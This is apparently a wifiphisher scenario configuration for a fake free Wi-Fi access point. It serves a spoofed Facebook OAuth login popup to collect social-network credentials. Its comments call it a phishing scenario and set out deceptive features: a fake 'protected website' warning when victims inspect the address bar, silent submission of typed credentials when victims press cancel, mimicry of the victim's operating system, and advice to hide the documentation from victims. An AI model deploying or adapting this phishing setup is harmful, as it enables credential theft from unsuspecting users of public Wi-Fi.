[info]
Name: OAuth Login Page
Description: A free Wi-Fi Service asking for social network credentials to authenticate via OAuth.

[context]
organization:
# Please avoid spaces in the end of each value. Some of them may not work if there is a space before or after the value.
# To use Oauth login popup set the popup value to true or set it to false to work with the typical HTML form.
# The Oauth popup currently is Compatible only with Windows and Mac-OS.
# All the changes are affecting the connected users to the fake AP and not wifiphisher users.
# If you want to add a page inside the popup go to template.html and add your code there. Then you can call your page inside login.html or any other page.
popup: true
# Unfortunately for the moment we don't have twitter login page but it will be available soon.
# Choices for the twitter button are: disable or alert. If the value has been set to alert then once the users try to connect using twitter it will show him the message bellow.
twitter_button: alert
twitter_button_message: Twitter is not available for the moment!
# The choice for Windows buttons are: hide or show. Those buttons are the buttons of minimizing and maximizing of the popup if the users OS is Windows. 
windows_minimize_button: hide
windows_maximize_button: hide
# Choices for Mac-OS buttons are : hide or show. To show the buttons without doing their job set the value of macos_buttons to false.
macos_minimize_button: show
macos_zoom_button: show
# Choices for macos_minimizing_behavior are: minimize or inpage.
# Minimize will do a full minimizing in other words closing the popup (because it's only a js popup and we cannot minimize it really but we can only simulate it's behavior)
# And inpage will do a minimize inside the web page and the title bar will still be shown there.
macos_minimizing_behavior: minimize
# To do a full minimizing (closing the popup) in Windows like Mac-OS remove // from windows_minimize_behavior and leave it empty like this: windows_minimizing_behavior:
# To do an inpage minimizing like Mac-OS set the value bellow to // 
windows_minimizing_behavior: //
# Don't mix between hiding Mac-OS buttons and disabling them (they're still shown but they do nothing). in order to hide them you need to go above and for disabling them change the value bellow.
# To disable Mac-OS buttons work (minimize and maximize/zoom) set the value to false. Please notice that close button in title bar is not affected.
# As default the value of Mac-OS buttons needs to be empty to let the buttons work. like this: macos_buttons:
macos_buttons:
# Windows does not have any animations so they are always disabled by default.
# Animation are enabled by default in Mac-OS. To disable them set the value bellow to false.
macos_animation: true
# Show a warning when the user click on the address bar (tries to see if the address bar is real). Change the value to false for disabling it.
addressbar_warning: true
# Modify the showed message when adressbar_warning is active.
adressbar_warning_message: This is a protected website. The address cannot be changed!
# The setting for facebook_cancel_button are : alert or redirect
# Either we will show an alert to the user or we redirect him to a new page when he clicks on cancel button 
# And if the user fills the required fields with informations (his credentials) then suddenly he regret his choice and tries to press cancel button for aborting the login process the popup will submit automatically his creds and cancel button will continue his work as normal (redirect or alert). 
facebook_cancel_button: redirect
# To change either the redirection or alert message change the values below.
# If you want to add a ' in the word bellow (didn't) you have to go directly to the html page and put the alert message there.
cancel_alert_message: User Didnt Sign In. No Internet access will be provided.
cancel_redirect_message: Failed to login.
#it's recommended to leave the settings bellow to default. Change them only when necessary
popup_title: Facebook
popup_movable: true
popup_resizable: true  
popup_maximized_movable: true
popup_maximized_resizable: true  
popup_width: 920
popup_height: 423
popup_minwidth: 800
popup_minheight: 400             
popup_position_left: 20
popup_position_top: 50

#Please notice that there are two ways for adding a custom page in the JS popup. Either using innerHTML or iframe.
#At the momment I'm using innerHTML, Which mean adding the popup page code within the page who will show the popup (More explanation and #details bellow).
#And the second methode is using iframe which means that the popup will show an external HTML file inside it.
#I tried to give a detailled Q&A to respond for all the question that the user can ask.
#----------------------------------------------------------------------------------
#The questions will cover the differnece between iframe and innerHTML and popup settings.
#So the easy one to use is it iframe or innerHTML?
#iframe (under certain conditions).
#The most efficient one to use ?
#Definetly innerHTML.
#Why to use iframe?
#It does not affect the main html page who will show the popup because in some situations when using innerHTML you'll have some conflicts with the page especially in the CSS. But iframe does not have this issue.
#Cons of iframe ?
#Lagging when dragging the popup especially when you drag it vertically.
#Why to use innerHTML ?
#No issue when dragging the popup.
#Cons of innerHTML ?
#Hard to modify for some unexpericend users.
#And like I mentioned before iframe will not have conflicts in the CSS or the html code with the page who'll show the popup but innerHTML will definitely do.
#Why then you're not using iframe if it's easy to use ?
#Yeah using iframe it's dead simple when creating the code but you'll have a issue which I already mentioned before (The vertical drag lagging does exists but not always and it will happen even in high specs devices). 
#When to use iframe? 
#iframe is recommended to be used only if the popup will be blocked in its place (unmovable).
#Things to know about using iframe ?
#To use iframe you need to call an external html file with his CSS (CSS can be external 'style.css' or internal '<style></style>' and both of them will work with iframe).  
#Which one of them it's recommended to be used ?
#Bottom line using iframe is easy to code and easy to use but it will always have a dragging issue.
#And innerHTML will not have a problem when dragging the popup but it's complicated to use.
#So the recommended one to use is innerHTML because basically we want to drag the popup and this is the whole reason why we even created this phishing scenario.
#How to use iframe ?
#To use iframe you need to call an html file with his CSS (CSS can be either external 'style.css' or internal '<style></style>' and both of them will work).  
#To use iframe replace 'html: HT' in the popup settings with: 'url: location-of-your-html-file.html', And Don't add "" in the popup settings I used them only to show you the parts that I'm talking about.

#Even though that using innerHTML is the best choice there are some obligations needs to be satisfied before the popup works :
#When to use innerHTML ?
#Almost in every situation.
#When I can't use innerHTML ?
#If you have some unfixable conflicts between the main page code and the popup code.
#How to use CSS for innerHTML ?
#Unlike iframe, innerHTML needs the CSS to be within the page who contains the popup (The CSS should be added with the CSS of the main page that contains the popup).
#Why not to use a whole style.css file with some other name only for the popup to avoid conflicts with the page containg the popup and call it separately?
#Sometimes if you're using a stylesheet like this: <link rel='stylesheet' href='static/css/style.css'> and you're calling it for innerHTML it may not work, and we don't want to take any risk that's why it's always recommended that the css of innerHTML to be with the main css of the html page who'll show the popup.
#How to use innerHTML ?
#First, you need to call the page as a constant and adding in the first of each new line ' and on the last of the line ' +  but in the last line you shouldn't add the + .#
#And Do not add the tags <html> </html> and <head> </head> and <body></body> Plus the code of the popup should start after the <body> tag directly without the <body> tag itself.
#The CSS of innerHTML page should be included with the CSS of the page who will show the popup.
#If you didn't understand how to use the popup in some part take a look at login.html and see if you could understand better.
#Things to know about the popup.
#For the apperance of the popup there are two choices either Mac-OS or Windows.
#For Mac-OS change the apperance tag with 'yosemite' and for the Windows apperance change the tag with 'redstone'
#if you want the popup to automatically show the appareance based on thier OS take a look about the methode I'm using in login.html file, But I'll explain it here.
#First I'm using a JS script reading the user agent header and will do a certain task if the conditions are satisified. in other words:
#you need to create two JS functions the first is for the Windows OS and we'll call it eg. function_windows() and the Second one for Mac-OS and we'll call it eg. function_macos() and then if the OS deicovery script found that the connected user is on Windows then script will start function_windows() and if he using Mac-OS then he'll start function_macos()
#And like I said before if you're using innerHTML then the code should be called inside a constant so there is a play here. We can set the constant before both functions but inside the JS script so that will give us one constant which gonna work with both functions, in other words we can that will give us a page who gonna work with both OSs and we're doing this to avoid repeating the page in each OS fucntion and we can do a page for each OS so it can be two pages or even more if there more than two fucntions.
#And remove all this Documentation once you've created your page because obviously we don't want the connected user to read this.
#The source of the used JS library : https://github.com/riversun/JSFrame.js
#For further information about using the JS popup check : https://github.com/riversun/JSFrame.js
